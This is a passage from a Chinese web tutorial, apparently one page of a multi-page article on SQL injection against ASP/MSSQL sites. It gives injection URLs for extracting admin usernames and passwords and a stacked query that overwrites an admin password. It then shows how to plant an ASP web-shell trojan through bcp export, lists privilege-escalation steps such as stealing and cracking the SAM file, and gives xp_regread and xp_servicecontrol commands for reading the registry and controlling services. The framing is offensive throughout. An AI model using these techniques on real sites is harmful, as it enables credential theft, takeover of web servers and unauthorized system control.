什么是SQL注入法攻击

• 简单法：猜用户名用
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一个字段，username是用户名字段，此时abc.asp工作异常，但能得到Username的值。与上同样的方法，可以得到第二用户名，第三个用户等等，直到表中的所有用户名。
  猜用户密码：HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一个字段，pwd是密码字段，此时abc.asp工作异常，但能得到pwd的值。与上同样的方法，可以得到第二用户名的密码，第三个用户的密码等等，直到表中的所有用户的密码。密码有时是经MD5加密的，可以改密码。
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=' ... where username='www';-- ( 1的MD5值为：AAABBBCCCDDDEEEF，即把密码改成1；www为已知的用户名)
  用同样的方法当然可把密码改原来的值。

  2、利用表内容导成文件功能
  
  SQL有BCP命令，它可以把表的内容导成文本文件并放到指定位置。利用这项功能，我们可以先建一张临时表，然后在表中一行一行地输入一个ASP木马，然后用BCP命令导出形成ASP文件。
  命令行格式如下：
  bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P Foobar ('S'参数为执行查询的服务器，'U'参数为用户名，'P'参数为密码，最终上传了一个runcommand.asp的木马)

  六、得到系统的管理员权限
  ASP木马只有USER权限，要想获取对系统的完全控制，还要有系统的管理员权限。怎么办？提升权限的方法有很多种：
  上传木马，修改开机自动运行的.ini文件(它一重启，便死定了)；
  复制CMD.exe到scripts，人为制造UNICODE漏洞；
  下载SAM文件，破解并获取OS的所有用户名密码；
  等等，视系统的具体情况而定，可以采取不同的方法。

  七、几个SQL-SERVER专用手段
  1、利用xp_regread扩展存储过程修改注册表
  [xp_regread]另一个有用的内置存储过程是xp_regXXXX类的函数集合(Xp_regaddmultistring，Xp_regdeletekey，Xp_regdeletevalue，Xp_regenumkeys，Xp_regenumvalues，Xp_regread，Xp_regremovemultistring，Xp_regwrite)。攻击者可以利用这些函数修改注册表，如读取SAM值，允许建立空连接，开机自动运行程序等。如：
  exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' 确定什么样的会话连接在服务器可用。
  exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities' 显示服务器上所有SNMP团体配置，有了这些信息，攻击者或许会重新配置同一网络中的网络设备。
  2、利用其他存储过程去改变服务器
  xp_servicecontrol过程允许用户启动，停止服务。如：
  (exec master..xp_servicecontrol 'start','schedule'
  exec master..xp_servicecontrol 'start','server')
  

• 上一页 [1] [2] [3] [4] [5] [6] [7] [8] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 什么是SQL注入法攻击 相关文章：
• ·asp代码-注册登陆代码
• ·注册表修改大全之XP
• ·2005 最新注册码大全
• ·注册表知识：HKEY_LOCAL_MACHINE根键详解
• ·Coreldraw12官方简体中文版下载及注册码
• ·注册表应用100例—注册表使用全攻略之十一
• ·软件注册码、安装序列号☆集锦
• ·什么是SQL注入法攻击
• ·在jsp中用bean和servlet联合实现用户注册、登录
• ·cmd下修改注册表完全攻略
• 什么是SQL注入法攻击 相关软件
• ·VirtuaGirl 虚拟女孩 V2.08 汉化注册版
• ·注册码生成器 V1.0
• ·COCO电脑监控系统 V 7.66 注册版
• ·统一驾照模拟考试系统v3.0　驾校版　+　注册机
• ·儿童经典诵读—名篇精品欣赏注音读本（专家朗诵版） V3.0.8.8
• ·注册表修改工具 V4.0
• ·Fraps游戏录影 注册版
• ·《实况足球9欧洲版》全系列注册表导入器
• ·理正电气 CAD Build 20612 免费注册版
• ·RegFix注册表关键键值修复工具 V1.21

上一篇:jsp实现图形验证码

下一篇:Photoshop一种反转片效果的制作方法

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐